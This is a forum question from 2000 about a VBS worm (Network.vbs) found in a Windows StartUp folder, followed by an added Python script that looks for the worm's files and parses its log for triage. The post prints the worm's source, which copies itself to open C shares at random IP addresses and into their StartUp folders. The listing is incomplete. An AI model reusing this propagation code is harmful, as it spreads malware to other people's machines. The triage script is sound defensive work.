Network.exe found in StartUp
Posted on 2000-04-25
I have an unattended computer with a fixed internet connection. I run NetMeeting so I can connect to this computer via the Internet, and I also run the dial-up server to allow me to connect by phone. Recently I found that two files had appeared in my StartUp directory: Network.exe and Network.VBS. These programs cause problems with my NetMeeting connections every time the computer is rebooted. If I delete them, they write themselves back while the computer is not accessed. It also writes a log file (Network.log) onto my bootup disk, with the content of a subnet address. It appears that the file Network.VBS is doing the job of logging and rewriting itself back, onto both the StartUp and Windows directory.
My question is: Where could this script possibly come from? For what purpose? What function does Network.exe perform? Could it be that someone who knows my IP address put them there so he can access my files?
The script is as follows:
count = "0"
dot = "."
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
on error resume next
do while driveconnected = "0"
wshnetwork.mapnetworkdrive "j:", sharename
driveconnected = "0"
Set myfile = fso1.createtextfile("c:\network.log", True)
If (fso1.fileexists("c:\network.log")) then
myfile.writeLine("Log file Open")
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile "c:\network.vbs", "j:\"
If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename)
fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\wind95\"
octd = octd + 1
if octd = "255" then randaddress()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
' driveconnected = 0
rand = int((254 * rnd) + 1)
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
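
For triage, the drop locations and log lines visible in the posted script can be turned into a check. This is an added example, not part of the original post: it assumes a copy of the affected C: drive is mounted at a directory passed as `root`, and the function names and the sample log (constructed, using a documentation address range) are hypothetical.

```python
import os
import re

# Drop locations taken from the copyfile lines in the posted script, plus the
# Network.exe the poster reports in StartUp. "startm~1" is the 8.3 alias of
# "start menu", so that directory is listed once under its long name.
DROP_PATHS = [
    "network.vbs", "network.log",
    "windows/network.vbs",
    "windows/start menu/programs/startup/network.vbs",
    "windows/start menu/programs/startup/network.exe",
    "win95/start menu/programs/startup/network.vbs",
    "wind95/network.vbs",
]

# Constructed sample in the format the script's writeline calls produce.
SAMPLE_LOG = r"""Log file Open
Subnet : 203.0.113.0
Copying files to : \\203.0.113.7\C
Successfull copy to : \\203.0.113.7\C
"""

def resolve_ci(root, rel):
    """Resolve rel under root ignoring case (FAT volume on a case-sensitive OS)."""
    cur = root
    for part in rel.split("/"):
        try:
            names = os.listdir(cur)
        except OSError:
            return None
        match = next((n for n in names if n.lower() == part), None)
        if match is None:
            return None
        cur = os.path.join(cur, match)
    return cur

def find_artifacts(root):
    """Return the drop paths that exist under root, in DROP_PATHS order."""
    return [p for p in DROP_PATHS if resolve_ci(root, p)]

LOG_RE = re.compile(r"^(Copying files to|Successfull copy to|Subnet) : (\S+)$")
KEYS = {"Copying files to": "attempted", "Successfull copy to": "copied", "Subnet": "subnets"}

def parse_log(text):
    """Sort network.log lines into shares attempted, shares written to, subnets scanned."""
    out = {"attempted": [], "copied": [], "subnets": []}
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            out[KEYS[m.group(1)]].append(m.group(2))
    return out
```

Any share listed under `copied` names another machine that received the script and should be checked in the same way.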